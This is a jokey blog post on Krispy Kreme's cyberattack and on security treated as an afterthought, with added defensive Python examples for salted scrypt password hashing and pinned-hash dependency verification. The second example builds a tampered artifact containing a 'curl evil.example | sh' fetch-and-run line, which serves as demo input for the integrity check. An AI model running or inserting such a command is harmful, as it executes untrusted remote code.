How Krispy Kreme’s Cybersecurity Went Stale🍩
Stale coffee is getting more common in our office. I understand this is becoming ubiquitous and that it represents the declining quality standard in software development.
Another thing that seems to be popular these days is falling victim to a cyber attack.
So, well done to Krispy Kreme for combining the two with its recent cyberattack. Let’s glaze over the details of their donuts for a moment to talk about the gaping security hole in their tech stack.
The Hole in the Donut
Krispy Kreme’s online ordering systems went offline in late November after an attack whose cause the company has not disclosed, a fact it sheepishly admitted in its latest SEC filing.
Customers across the U.S. were left tapping refresh on a broken digital experience. The attack is expected to cause financial losses, not just from the digital sales that evaporated but also from the obligatory too-late hiring of cybersecurity experts and the restoration of compromised systems.
This isn’t right. The industry’s increasing reliance on half-baked digital systems without thorough testing is causing a rising number of cyberattacks throughout 2024.
Why Security is Always the Last Item on the Sprint Backlog
In tech, security is an afterthought.
This isn’t limited to a donut company (there’s a hole in their business plan as well as in their products): everyone is rushing features out of the door. Sure, they build the MVP and it might even scale, but nobody remembers to patch those APIs or to check whether storing passwords in plaintext was really a good idea (protip: it wasn’t).
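To make the plaintext-password point concrete, here is an added example (my code, not anything from Krispy Kreme or the original post) that puts the half-baked credential store beside a hardened one: a per-user salt, a memory-hard KDF (scrypt from the standard library), and a constant-time comparison. The user names, passwords and table layout are constructed for illustration only.

```python
"""Added example: plaintext credential store vs. salted scrypt store.
Names, passwords and the table layout are constructed for this demo."""
import hashlib
import hmac
import os

# Sample credentials, constructed for this example only.
USERS = {"alice": "correct horse battery staple", "bob": "hunter2"}


# --- The half-baked version: store the string, compare the string. ---
def plaintext_store(users):
    # Whoever dumps this table gets every password, reusable on other sites.
    return dict(users)


def plaintext_verify(store, username, password):
    return store.get(username) == password


# --- The hardened version: per-user salt plus a memory-hard KDF. ---
SCRYPT_PARAMS = dict(n=2**14, r=8, p=1)  # cost parameters; tune so a hash takes ~100 ms


def hash_password(password, salt=None):
    """Return a record holding salt, digest and the KDF parameters used."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, dklen=32, **SCRYPT_PARAMS)
    # Parameters travel with the record so they can be raised later without a flag day.
    return {"salt": salt, "hash": digest, **SCRYPT_PARAMS}


def hashed_store(users):
    return {name: hash_password(pw) for name, pw in users.items()}


def hashed_verify(store, username, password):
    rec = store.get(username)
    if rec is None:
        # Run the KDF anyway so an unknown user costs the same time as a wrong password.
        hash_password(password, salt=b"\x00" * 16)
        return False
    candidate = hashlib.scrypt(password.encode(), salt=rec["salt"], dklen=32,
                               n=rec["n"], r=rec["r"], p=rec["p"])
    # Constant-time compare: never `==` on secrets.
    return hmac.compare_digest(candidate, rec["hash"])


def leaked_passwords(store):
    """What a table dump hands an attacker: the plaintext values if the store
    holds strings, nothing directly usable if it holds salted hashes."""
    return sorted(v for v in store.values() if isinstance(v, str))


if __name__ == "__main__":
    weak = plaintext_store(USERS)
    strong = hashed_store(USERS)
    print("leaked from plaintext store:", leaked_passwords(weak))
    print("leaked from hashed store:   ", leaked_passwords(strong))
    print("alice logs in:", hashed_verify(strong, "alice", "correct horse battery staple"))
    print("alice with wrong password:", hashed_verify(strong, "alice", "wrong"))
```

Two details worth noticing: the salt means two users with the same password get different digests, so a dump cannot be cracked once and reused, and the KDF parameters are stored with each record so they can be raised over time as hardware gets faster.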
From my own experience, security reviews are few and far between. Everyone agrees it’s important, but nobody wants to do it, and when they do it’s a half-job. It seems that customers expect their privacy to be breached these days, and don’t lose trust. The public are becoming part of the problem.
Aspirin for Corporate Headaches
Krispy Kreme expects its cybersecurity insurance to “offset a portion of the costs”. We should be happy that this hasn’t hit their shareholders, but I can’t feel any emotion towards the wheels of capitalism.
Why fix a problem when someone else’s money will fix it for you? Meanwhile, patching critical bugs comes out of software developers’ personal time.
Companies no longer seem to worry about the reputation hit. Makes sense though, when Krispy Kreme donuts taste like that.
Oh Dear
Dough. Fritter. Jam. Fry.
I’m above the obvious puns.
Lessons From the Glazed Battlefield
Security First
It’s not glamorous, but building security into your processes is critical. Customers are going to get wise to which companies care about them. Granted, that’s none of them at the moment, but eventually companies will start to compete on trust again, and you should want to be in that space.
Trust No One
APIs, dependencies, and even your own code are potential weak points. Verify everything. Test, test, test.
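“Verify everything” is easy to say; here is what it looks like for a dependency. This is an added example (mine, not from the original post), modelled on what `pip install --require-hashes` does: an artifact is only accepted if its SHA-256 matches a pinned value, and an artifact with no pin at all is refused rather than trusted by default. The artifact bytes and the lockfile-style pins are constructed for the demo.

```python
"""Added example: pinned-hash verification of a fetched dependency.
Artifact contents and pins are constructed for this demo."""
import hashlib
import hmac


class IntegrityError(Exception):
    """Raised when a dependency cannot be tied back to a pinned hash."""


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# A genuine build, as the lockfile author saw it when pinning. Constructed.
GOOD_ARTIFACT = b"print('genuine build of donut-api 1.2.3')\n"

# Lockfile-style pins: artifact name -> expected sha256 hex. Constructed.
PINNED = {"donut-api-1.2.3.tar.gz": sha256_hex(GOOD_ARTIFACT)}


def verify_artifact(name, data, pins=PINNED):
    """Return True only if `data` matches the pin recorded for `name`."""
    expected = pins.get(name)
    if expected is None:
        # No pin means no basis for trust: fail closed instead of installing.
        raise IntegrityError(f"{name}: no pinned hash, refusing unpinned dependency")
    actual = sha256_hex(data)
    if not hmac.compare_digest(actual, expected):
        raise IntegrityError(f"{name}: hash mismatch, expected {expected[:12]} got {actual[:12]}")
    return True


def install(name, data, pins=PINNED):
    """Gatekeeper an installer would call before unpacking anything."""
    try:
        verify_artifact(name, data, pins)
    except IntegrityError as err:
        return ("rejected", str(err))
    return ("installed", name)


if __name__ == "__main__":
    tampered = GOOD_ARTIFACT + b"import os; os.system('curl evil.example | sh')\n"
    print(install("donut-api-1.2.3.tar.gz", GOOD_ARTIFACT))
    print(install("donut-api-1.2.3.tar.gz", tampered))
    print(install("mystery-lib-0.0.1.tar.gz", b"anything"))
```

The same shape applies to container images, firmware blobs and anything else pulled in at build time: pin the digest where a human reviewed it, and make the install step fail closed when the digest is missing or wrong.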
Train Developers, Not Just Systems
Security awareness is like commenting on your code: often neglected, but life-saving when done right.
Conclusion
Ultimately, Krispy Kreme’s digital mishap is a reminder that software developers hold the keys to trust, and we should be working on building trustworthy platforms that work great for customers.
But hey, at least Krispy Kreme has tasty consolation prizes for those braving their in-person stores.